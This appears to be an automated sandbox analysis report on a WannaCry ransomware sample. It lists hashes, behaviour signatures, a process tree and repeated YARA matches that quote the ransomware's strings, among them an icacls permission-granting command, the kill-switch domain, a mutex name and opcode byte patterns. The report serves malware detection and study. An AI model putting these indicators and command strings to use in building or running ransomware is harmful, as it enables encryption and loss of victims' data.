Edit tour

Windows Analysis Report
MSNRf9dZ63.exe

Overview

General Information

Sample Name:	MSNRf9dZ63.exe
Analysis ID:	721108
MD5:	1d38638153085a0a0f0a4f7174e52a9b
SHA1:	f0bb8179052451ac327e6fff048bc27c73bf7310
SHA256:	9678763f65e207dde99f4f8723ddfc44bc2d3f9b490aa3d3d4676c661474d59f
Infos:

Detection

Wannacry

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Detected Wannacry Ransomware

Malicious sample detected (through community Yara rule)

Yara detected Wannacry ransomware

Antivirus / Scanner detection for submitted sample

Tries to download HTTP data from a sinkholed server

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Machine Learning detection for sample

Machine Learning detection for dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

MSNRf9dZ63.exe (PID: 4548 cmdline: C:\Users\user\Desktop\MSNRf9dZ63.exe MD5: 1D38638153085A0A0F0A4F7174E52A9B)

tasksche.exe (PID: 5512 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 7F7CCAA16FB15EB1C7399D422F8363E8)

MSNRf9dZ63.exe (PID: 4348 cmdline: C:\Users\user\Desktop\MSNRf9dZ63.exe -m security MD5: 1D38638153085A0A0F0A4F7174E52A9B)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
MSNRf9dZ63.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x31f5a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x31f57c:$x3: tasksche.exe 0x31f558:$x4: Global\MsWinZonesCacheCounterMutexA 0x31f5d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0xe048:$x7: mssecsvc.exe 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x31f5a0:$x9: icacls . /grant Everyone:F /T /C /Q 0xe034:$s1: C:\%s\%s 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x31f4d0:$s3: cmd.exe /c "%s" 0x351a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x312aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
MSNRf9dZ63.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
MSNRf9dZ63.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x31f57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x31f5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
MSNRf9dZ63.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x3120ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x31785e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\tasksche.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
C:\Windows\tasksche.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
C:\Windows\tasksche.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000000.252768487.000000000040E000.00000008.00000001.01000000.00000005.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000000.249857244.000000000040F000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000000.247075924.000000000040F000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000000.249931141.0000000000710000.00000002.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000000.247147186.0000000000710000.00000002.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Process Memory Space: MSNRf9dZ63.exe PID: 4548	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: MSNRf9dZ63.exe PID: 4348	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.0.MSNRf9dZ63.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.0.MSNRf9dZ63.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.0.MSNRf9dZ63.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
2.0.tasksche.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
2.0.tasksche.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
2.0.tasksche.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
2.2.tasksche.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
2.2.tasksche.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
2.2.tasksche.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.2.MSNRf9dZ63.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.2.MSNRf9dZ63.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.2.MSNRf9dZ63.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.MSNRf9dZ63.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.MSNRf9dZ63.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.MSNRf9dZ63.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.0.MSNRf9dZ63.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.MSNRf9dZ63.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
